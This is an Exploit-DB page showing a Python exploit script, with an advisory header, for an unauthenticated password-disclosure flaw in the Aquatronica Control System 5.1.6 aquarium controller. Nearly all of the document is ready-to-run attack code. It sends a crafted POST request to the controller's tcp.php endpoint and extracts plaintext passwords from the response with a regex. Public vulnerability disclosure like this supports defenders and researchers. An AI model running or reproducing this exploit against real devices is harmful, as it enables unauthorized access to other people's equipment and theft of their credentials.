3ac07794c9
7 changes to exploits/shellcodes/ghdb Aquatronica Control System 5.1.6 - Information Disclosure Check Point Security Gateway - Information Disclosure (Unauthenticated) changedetection < 0.45.20 - Remote Code Execution (RCE) BWL Advanced FAQ Manager 2.0.3 - Authenticated SQL Injection ElkArte Forum 1.1.9 - Remote Code Execution (RCE) (Authenticated) iMLog < 1.307 - Persistent Cross Site Scripting (XSS)
86 lines
No EOL
2.3 KiB
Python
Executable file
86 lines
No EOL
2.3 KiB
Python
Executable file
#!/usr/bin/env python
|
|
# -*- coding: utf-8 -*-
|
|
#
|
|
#
|
|
# Aquatronica Control System 5.1.6 Passwords Leak Vulnerability
|
|
#
|
|
#
|
|
# Vendor: Aquatronica s.r.l.
|
|
# Product web page: https://www.aquatronica.com
|
|
# Affected version: Firmware: 5.1.6
|
|
# Web: 2.0
|
|
#
|
|
# Summary: Aquatronica's electronic AQUARIUM CONTROLLER is easy
|
|
# to use, allowing you to control all the electrical devices in
|
|
# an aquarium and to monitor all their parameters; it can be used
|
|
# for soft water aquariums, salt water aquariums or both simultaneously.
|
|
#
|
|
# Desc: The tcp.php endpoint on the Aquatronica controller is exposed
|
|
# to unauthenticated attackers over the network. This vulnerability
|
|
# allows remote attackers to send a POST request which can reveal
|
|
# sensitive configuration information, including plaintext passwords.
|
|
# This can lead to unauthorized access and control over the aquarium
|
|
# controller, compromising its security and potentially allowing attackers
|
|
# to manipulate its settings.
|
|
#
|
|
# Tested on: Apache/2.0.54 (Unix)
|
|
# PHP/5.4.17
|
|
#
|
|
#
|
|
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
|
|
# @zeroscience
|
|
#
|
|
#
|
|
# Advisory ID: ZSL-2024-5824
|
|
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2024-5824.php
|
|
#
|
|
#
|
|
# 04.05.2024
|
|
#
|
|
|
|
import requests, html, re, sys, time
|
|
from urllib.parse import unquote
|
|
|
|
program = "TCP"
|
|
command = "ws_get_network_cfg"
|
|
function_id = "TCP_XML_REQUEST"
|
|
|
|
print("""
|
|
_________ . .
|
|
(.. \_ , |\ /|
|
|
\ O \ /| \ \/ /
|
|
\______ \/ | \ /
|
|
vvvv\ \ | / |
|
|
\^^^^ == \_/ |
|
|
`\_ === \. |
|
|
/ /\_ \ / |
|
|
|/ \_ \| /
|
|
___ ______________\________/________aquatronica_0day___
|
|
| |
|
|
| |
|
|
| |
|
|
""")
|
|
|
|
if len(sys.argv) != 2:
|
|
print("Usage: python aqua.py <ip:port>")
|
|
sys.exit(1)
|
|
|
|
ip = sys.argv[1]
|
|
url = f"http://{ip}/{program.lower()}.php"
|
|
|
|
post_data = {'function_id' : function_id.lower(),
|
|
'command' : command.upper()}
|
|
|
|
r = requests.post(url, data=post_data)
|
|
|
|
if r.status_code == 200:
|
|
r_d = unquote(r.text)
|
|
f_d_r = html.unescape(r_d)
|
|
regex = r'pwd="([^"]+)"'
|
|
rain = re.findall(regex, f_d_r)
|
|
|
|
for drops in rain:
|
|
print(' ',drops)
|
|
time.sleep(0.5)
|
|
else:
|
|
print(f"Dry season! {r.status_code}") |